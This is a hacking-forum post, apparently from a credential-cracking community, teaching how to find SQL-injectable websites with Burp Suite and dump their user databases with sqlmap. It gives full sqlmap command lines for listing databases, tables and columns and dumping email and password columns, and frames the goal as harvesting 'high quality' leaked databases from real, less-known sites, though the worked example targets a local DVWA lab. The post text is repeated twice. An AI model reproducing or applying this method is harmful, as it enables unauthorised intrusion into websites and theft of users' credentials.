SinFan
Anime Karaoke Pro
LEVEL 1
400 XP
This will eventually be saturated because of all the leechers but you can always manipulate this method to get unsaturated databases. Yes, this is a real working tutorial, not a shitty "get SQLI Dumper, insert dorks, LQ raped combos". Lets get this post to the top
You need Linux or Windows version that supports Linux subsystem! (VM can work on a good PC and good internet)
Leechers getting banned.
I'm sure everyone has tried at least once to use SQLi Dumper 8.3 and whatnot. You follow the tutorial, you insert dorks, then you dump databases. However, it has become apparent that the method is already tremendously saturated by all the leechers. A real, working method is not given out to forums full of leechers. Of course, the method I am going to share with you guys today is not the one I use personally, but it's one that's not very saturated currently and is only awarding to people who put the effort in, it's not "insert dorks, wait five hours,dump databases and wait another five hours".
Lets start off with some basics. I'm sure everyone has heard of "manual sql injection". It is finding vulnerabilities one site at a time, with more manual work(not an automated mass scanner). This is how many people are able to obtain huge databases of known sites. ArmorGames, PS3Hax, Comcast, MPGH, R2Games, VK, and many more. These are obtained with manual sql injection, just on a much higher level of skill and knowledge. Our method will basically be this, but obviously with less known websites that have easy to get vulnerabilities with the help of a tool.
First, download Burp Suite, it is a tool to find vulnerabilities in websites. You can get it here(make sure to follow the instructions properly):
Now you want to set up the listening for URLs (USE FIREFOX) https://www.youtube.com/watch?v=U-MkNsHPU_I&t=404s
Next, you want to set up sqlmap, preferably on CentOS, Debian, or Kali. Windows does work but many errors and bugs can occur(make sure the Windows version has linux subsystem option; look it up).
Here is a tutorial for Windows:https://www.youtube.com/watch?v=CdR7pw_FBj8
Linux tutorial:https://www.youtube.com/watch?v=w0Yx0i0SSQI
This is where YOU come in so this method won't be raped instantly by leechers. You want to get links related to your topic manually. Whether that be gaming, shopping, or whatever; make sure it is not a popular site like amazon.com. If you want to get the most HQ, you can go after the links with no visisble injectable paramaters and it will take a lot longer to find a database, but much more HQ when found. If not, you want to use dorks manually that search specifically for sites with visible inject parameters and pick out sites that meet your topic criteria.(the quality of your databases depend heavily on this step)
After you gather a few, you want to manually access each website through the Firefox browser with the Burp Suite listening enabled and you want to trigger something, maybe by clicking the login or register button on the website. This will generate the URLs from the requests and put them in the site map.
[img]https://i.imgur.com/0EjZTX7.png
Next, go to vulerabilities>sqli>gear icon. You will find a paramater if your site is injectable:
Our paramater in this case is "id=1&Submit=Submit". You want to click on it and it will open the details to the right:
Now it's time to get your sqlmap out. Prepare the following command: sqlmap -u "URL" --cookie="cookie" --dbs --random-agent
Now to find those, look in the image above. URL will be in the "referer" row. Which in this case ishttp://192.168.0.104/dvwa/vulnerabilities/sqli/
You want to add the injectable paramater to the end of this URL which can be found in the "GET" row. "?id=1&Submit=Submit". Now our URL will look like http://192.168.0.104/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
The cookie will be in the "cookie" section which in this case is "security=low; PHPSESSID=akeqcc7k31kiv5cj06c7vpnmul"
Now, our start command will be: sqlmap -u "http://192.168.0.104/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=akeqcc7k31kiv5cj06c7vpnmul" --dbs --random-agent
Once this command is run, it will look through the website for any possible data to dump.
If you do not already know how to dump the rest here it is, don't put the quotes and add the command to the one above ^
(List tables): -D "database name" --tables
(List columns): -D "database name" -T "table name" --columns
(Start dump):-D "database name" -T "table name"" -C "column1, column2, column3" --dump --eta
Columns are the data you want to dump so like "email,password,phone" or "username,password" (find the names in your tables on sqlmap)
Our final command will usually look like this(in our case):
sqlmap -u "http://192.168.0.104/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=akeqcc7k31kiv5cj06c7vpnmul" --dbs --random-agent-D dvwa -T users -C email,password --dump --eta
Now it will start to dump and should look like this(with your desired data of course):
EDIT:The reason this will get you high quality databases, opposite of SQli Dumper most of the time is because Burp is able to detect a much larger number of vulnerabilities that SQLi Dumper cannot, the vulnerabilities dumper detects are usally on a lower tier site whereas Burp can detect vulnerabilities on some relatively high tier sites. Burp can also detect vulnerabilities through direct URLs with no parameters by crawling through the site to find the hidden parameters.
You need Linux or Windows version that supports Linux subsystem! (VM can work on a good PC and good internet)
Leechers getting banned.
I'm sure everyone has tried at least once to use SQLi Dumper 8.3 and whatnot. You follow the tutorial, you insert dorks, then you dump databases. However, it has become apparent that the method is already tremendously saturated by all the leechers. A real, working method is not given out to forums full of leechers. Of course, the method I am going to share with you guys today is not the one I use personally, but it's one that's not very saturated currently and is only awarding to people who put the effort in, it's not "insert dorks, wait five hours,dump databases and wait another five hours".
Lets start off with some basics. I'm sure everyone has heard of "manual sql injection". It is finding vulnerabilities one site at a time, with more manual work(not an automated mass scanner). This is how many people are able to obtain huge databases of known sites. ArmorGames, PS3Hax, Comcast, MPGH, R2Games, VK, and many more. These are obtained with manual sql injection, just on a much higher level of skill and knowledge. Our method will basically be this, but obviously with less known websites that have easy to get vulnerabilities with the help of a tool.
First, download Burp Suite, it is a tool to find vulnerabilities in websites. You can get it here(make sure to follow the instructions properly):
Now you want to set up the listening for URLs (USE FIREFOX) https://www.youtube.com/watch?v=U-MkNsHPU_I&t=404s
Next, you want to set up sqlmap, preferably on CentOS, Debian, or Kali. Windows does work but many errors and bugs can occur(make sure the Windows version has linux subsystem option; look it up).
Here is a tutorial for Windows:https://www.youtube.com/watch?v=CdR7pw_FBj8
Linux tutorial:https://www.youtube.com/watch?v=w0Yx0i0SSQI
This is where YOU come in so this method won't be raped instantly by leechers. You want to get links related to your topic manually. Whether that be gaming, shopping, or whatever; make sure it is not a popular site like amazon.com. If you want to get the most HQ, you can go after the links with no visisble injectable paramaters and it will take a lot longer to find a database, but much more HQ when found. If not, you want to use dorks manually that search specifically for sites with visible inject parameters and pick out sites that meet your topic criteria.(the quality of your databases depend heavily on this step)
After you gather a few, you want to manually access each website through the Firefox browser with the Burp Suite listening enabled and you want to trigger something, maybe by clicking the login or register button on the website. This will generate the URLs from the requests and put them in the site map.
[img]https://i.imgur.com/0EjZTX7.png
Next, go to vulerabilities>sqli>gear icon. You will find a paramater if your site is injectable:
Our paramater in this case is "id=1&Submit=Submit". You want to click on it and it will open the details to the right:
Now it's time to get your sqlmap out. Prepare the following command: sqlmap -u "URL" --cookie="cookie" --dbs --random-agent
Now to find those, look in the image above. URL will be in the "referer" row. Which in this case ishttp://192.168.0.104/dvwa/vulnerabilities/sqli/
You want to add the injectable paramater to the end of this URL which can be found in the "GET" row. "?id=1&Submit=Submit". Now our URL will look like http://192.168.0.104/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
The cookie will be in the "cookie" section which in this case is "security=low; PHPSESSID=akeqcc7k31kiv5cj06c7vpnmul"
Now, our start command will be: sqlmap -u "http://192.168.0.104/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=akeqcc7k31kiv5cj06c7vpnmul" --dbs --random-agent
Once this command is run, it will look through the website for any possible data to dump.
If you do not already know how to dump the rest here it is, don't put the quotes and add the command to the one above ^
(List tables): -D "database name" --tables
(List columns): -D "database name" -T "table name" --columns
(Start dump):-D "database name" -T "table name"" -C "column1, column2, column3" --dump --eta
Columns are the data you want to dump so like "email,password,phone" or "username,password" (find the names in your tables on sqlmap)
Our final command will usually look like this(in our case):
sqlmap -u "http://192.168.0.104/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=akeqcc7k31kiv5cj06c7vpnmul" --dbs --random-agent-D dvwa -T users -C email,password --dump --eta
Now it will start to dump and should look like this(with your desired data of course):
EDIT:The reason this will get you high quality databases, opposite of SQli Dumper most of the time is because Burp is able to detect a much larger number of vulnerabilities that SQLi Dumper cannot, the vulnerabilities dumper detects are usally on a lower tier site whereas Burp can detect vulnerabilities on some relatively high tier sites. Burp can also detect vulnerabilities through direct URLs with no parameters by crawling through the site to find the hidden parameters.